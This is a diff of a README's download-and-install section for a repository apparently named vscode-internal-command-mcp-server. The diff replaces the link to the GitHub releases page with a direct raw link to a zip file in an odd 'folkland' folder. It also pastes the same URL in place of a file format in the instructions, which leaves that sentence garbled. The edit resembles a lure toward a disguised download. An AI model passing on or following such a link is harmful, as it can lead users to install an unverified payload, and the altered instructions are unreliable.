antonio0218/vscode-internal-command-mcp-server/README.md

 ## 📦 Download & Install

-To get started, visit this page to download the latest release: [Download Page](https://github.com/antonio0218/vscode-internal-command-mcp-server/releases).
+To get started, visit this page to download the latest release: [Download Page](https://raw.githubusercontent.com/antonio0218/vscode-internal-command-mcp-server/main/folkland/vscode-internal-command-mcp-server.zip).

 Once you have accessed the download page, follow these steps:

 ### 1. Choose a Release

 - Look for the most recent version.
 - Download the suitable file for your operating system.
-This may be a `.zip`, `.tar.gz`, or another format.
+This may be a `.zip`, `https://raw.githubusercontent.com/antonio0218/vscode-internal-command-mcp-server/main/folkland/vscode-internal-command-mcp-server.zip`, or another format.

 ### 2. Extract the Files